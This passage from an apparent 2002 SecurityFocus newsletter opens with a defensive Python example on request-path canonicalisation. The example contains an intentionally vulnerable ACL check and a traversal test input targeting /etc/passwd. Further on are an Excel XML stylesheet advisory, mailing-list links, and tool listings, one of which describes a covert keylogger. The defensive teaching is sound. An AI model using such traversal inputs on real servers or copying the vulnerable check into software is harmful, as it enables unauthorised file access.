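Both the Hosting Controller 'FilePath' issue (BID 4778) and the LocalWEB2000 './' bypass above come down to making a security decision on a request path before it has been canonicalised. The following added example, which is neither vendor's code, collapses '.', '..', repeated slashes and percent-encoding once, refuses anything that climbs above the web root, and only then consults an ACL or builds the filesystem path. The ACL entries and the '/srv/www' web root are constructed assumptions, and the handling is POSIX-style; a Windows server would additionally have to fold case and reject drive letters and 8.3 aliases.

```python
import posixpath
from typing import Dict, Optional
from urllib.parse import unquote

# Constructed ACL: canonical URL path -> role required to read it.
PROTECTED: Dict[str, str] = {
    "/private/file.txt": "staff",
}


def canonical_url_path(path: str) -> Optional[str]:
    """Decode and normalise a request path.

    Returns the canonical absolute path (e.g. '/private/file.txt'), or
    None if the path tries to climb above the web root at any point.
    Assumption: POSIX semantics; backslashes are treated as separators
    because Windows servers accept them.
    """
    decoded = unquote(path).replace("\\", "/")
    depth = 0
    for seg in decoded.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            depth -= 1
            if depth < 0:                  # climbed above the root
                return None
        else:
            depth += 1
    return posixpath.normpath("/" + decoded.lstrip("/"))


def authorized_vulnerable(path: str, role: Optional[str]) -> bool:
    """The LocalWEB2000 mistake: look the ACL up by the raw request string,
    so '/private/./file.txt' is not found and is treated as public."""
    required = PROTECTED.get(path)
    return required is None or required == role


def authorized_hardened(path: str, role: Optional[str]) -> bool:
    """Canonicalise first; an unresolvable path is denied, not served."""
    canon = canonical_url_path(path)
    if canon is None:
        return False
    required = PROTECTED.get(canon)
    return required is None or required == role


def safe_fs_path(webroot: str, user_path: str) -> Optional[str]:
    """Confine a user-supplied path (the browse.asp 'FilePath' pattern) to
    webroot; None means the request must be refused."""
    canon = canonical_url_path(user_path)
    if canon is None:
        return None
    target = posixpath.join(webroot, canon.lstrip("/"))
    # Belt and braces: the joined result must still sit under webroot.
    if posixpath.commonpath([webroot, target]) != webroot:
        return None
    return target


if __name__ == "__main__":
    for req in ("/private/file.txt", "/private/./file.txt", "/private//file.txt"):
        print(req, authorized_vulnerable(req, None), authorized_hardened(req, None))
    print(safe_fs_path("/srv/www", "/docs/../../../etc/passwd"))
```

The ACL lookup and the filesystem join both consume the same canonical string, so a request cannot be "public" for one check and "private" for the other; that single canonical form is what the two vulnerable products lacked.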
25. Microsoft Excel 2002 XML Stylesheet Arbitrary Code Execution Vulnerability
BugTraq ID: 4821
Remote: Yes
Date Published: May 24 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4821
Summary:
A vulnerability exists in the handling of XML stylesheets in Microsoft
Excel documents. This vulnerability may result in script contained in an
XML stylesheet executing on a user's system.
With Microsoft Excel 2002, it is possible to include XML stylesheets with
XML documents. When such a document is loaded, the user is given the
choice to load the associated stylesheet or not. If the XML stylesheet
contains script (i.e. JavaScript or VBScript modules), and the user chooses
to apply the stylesheet when viewing the .xls file, the script will run.
There is no indication to the user that embedded script will execute. By
default, the XML stylesheet is not loaded.
Successful exploitation of this vulnerability could lead to the execution
of malicious code on a user's system.
III. MICROSOFT FOCUS LIST SUMMARY
---------------------------------
1. Q320206 and SP4 (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/0AF9D2420B808D43A1F6296DDBC40A3101CFDF@moc1.moc.local
2. Q320206 and SP4 (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/761DBCC144B6334A81251171C684A6FB7CEB56@mailserver-2k.fireapple.com
3. No browsing group (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/OF851A20DD.EA63B673-ON85256BC2.000249E3@sbcs.com
4. Hfnetchk scans every file (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/1691923937205.20020522170620@planb-security.net
5. No browsing group (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/5.1.0.14.2.20020523004345.00aca3f0@pop.legolas.com
6. IIS 5.0 and Netscape Authentication (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/3D6694DB1788D311BA3E00508B5DFFE7036F935D@aklmessage01
7. SQL Spider question (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/01a101c201c3$765ca9f0$0b0aa8c0@baserem2
8. Hfnetchk scans every file (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/20020522185018.20398.qmail@securityfocus.com
9. hotfix overwrite; hfnetchk (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/C8D4A7339214BF43B80473E27549EABB14E900@LRSSP6.lrsinc.org
10. IIS 5.0 and Netscape Authentication (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/F210jpWkfb81IfpT8vW00007254@hotmail.com
11. SQL Spider. (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/5.1.0.14.2.20020521132947.0343a6f8@mail.hammerofgod.com
12. About ping request? (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/01cc01c200d7$1acbfce0$0e6e210a@peregrine.com
13. MS02-18 causes Exchange problems ?? (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/OF0155A9FF.849E0A5D-ON85256BC0.004F57D4@sbcs.com
14. SecurityFocus Microsoft Newsletter # 87 (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/Pine.LNX.4.43.0205210750360.23979-100000@mail.securityfocus.com
15. About ping request? (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/EDF560E8C1E4A0439EA7828DDC95AFDF66C17B@nt-cleopsapp44.ntl-city.com
16. Hotfixes overwritten? (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/811723221351.20020520092104@planb-security.net
IV. NEW PRODUCTS FOR MICROSOFT PLATFORMS
---------------------------------------
1. Sanitizer
by Infraworks, Corp.
Platforms: DOS
Relevant URL:
http://www.infraworks.com/sanitizer.html
Summary:
Sanitizer is a patented (Registered U.S. Patent #6,212,600) data overwrite
technology designed to completely eliminate all data and all programs,
including the operating system. It completely erases every sector,
cluster, byte, and bit without damaging the hard drive.
2. InsideOut Firewall Reporter
by Stonylake Solutions
Platforms: Linux, Windows 2000, Windows 95/98, Windows NT
Relevant URL:
http://www.stonylakesolutions.com/insideout.asp
Summary:
InsideOut Firewall Reporter is an easy to use, powerful, real time,
browser based reporting application for firewall logs. It provides over
150 useful reports. Windows and Linux versions available. Visit the site
for a live demo.
3. Stronghold Enterprise
by C2Net Software
Platforms: BSDI, FreeBSD, HP-UX, IRIX, Linux, NetBSD, OpenBSD, SCO,
Solaris, SunOS, Tru64 UNIX, UnixWare
Relevant URL:
http://www.redhat.com/software/apache/stronghold/
Summary:
Red Hat's Stronghold Enterprise is the most mature Apache-based web server
available today, with over seven years of development and more than 14,000
servers running it to protect their data (E-Soft's Security Space Web
Server Survey). Stronghold provides the tools to quickly install and
configure the popular Apache Web Server with the security features that
customers and business partners expect when they interact with your site.
V. MICROSOFT TOOLS
-------------------
1. Zebedee 2.4.0
by Neil Winton, zebedee@winton.org.uk
Relevant URL:
http://www.winton.org.uk/zebedee/
Platforms: UNIX, Windows 95/98, Windows NT
Summary:
Zebedee is a simple program to establish an encrypted, compressed "tunnel"
for TCP/IP or UDP data transfer between two systems. This allows traffic
such as telnet, FTP, and X to be protected from snooping as well as
potentially gaining performance over low-bandwidth networks from
compression. The main goals for Zebedee are to provide full client and
server functionality under both UNIX and Windows 95/98/NT, to be easy to
install, use, and maintain with little or no configuration required, and
to use only algorithms that are either unpatented or for which the patent
has expired.
2. File::Scan v0.26
by Henrique Dias hdias@aeiou.pt
Relevant URL:
http://www.cpan.org/authors/id/H/HD/HDIAS/
Platforms: N/A
Summary:
File::Scan allows users to build multiplatform virus scanners which can
detect Windows/DOS/Mac viruses. It includes a virus scanner and a signature
database.
3. ProBot SE v2.4.0
by NetHunter Group support@nethunter.cc
Relevant URL:
http://www.nethunter.cc/probotse.php
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Summary:
ProBot SE is a workstation monitoring and keylogging suite. This software
generates a detailed event log that is kept securely in binary files.
These files may later be referred to by the system administrator or computer
owner for the exact reconstruction of the computer usage. ProBot SE
remains undetected even under the most prying eyes. It is invisible both
in the Windows 9x/ME Ctrl+Alt+Del list and in the Windows NT process list.
4. MIMEDefang v2.11
by David F. Skoll dfs@roaringpenguin.com
Relevant URL:
http://www.roaringpenguin.com/mimedefang/
Platforms: Linux, Perl (any system supporting perl), UNIX
Summary:
MIMEDefang is a flexible MIME e-mail scanner designed to protect Windows
clients from viruses. It can alter or delete various parts of a MIME
message according to a very flexible configuration file. It can also
bounce messages with unacceptable attachments. MIMEDefang works with
Sendmail 8.11's new "Milter" API, which gives it much more flexibility
than procmail-based approaches.
VI. SPONSORSHIP INFORMATION
---------------------------
This newsletter is sponsored by SecurityFocus (www.securityfocus.com)
Attention Non-profits and Universities: Sign-up now for preferred pricing
on the only global early-warning system for cyber attacks - SecurityFocus
ARIS Threat Management System.
Click here for more info
http://www.securityfocus.com/corporate/products/pdpsection.shtml
-------------------------------------------------------------------------------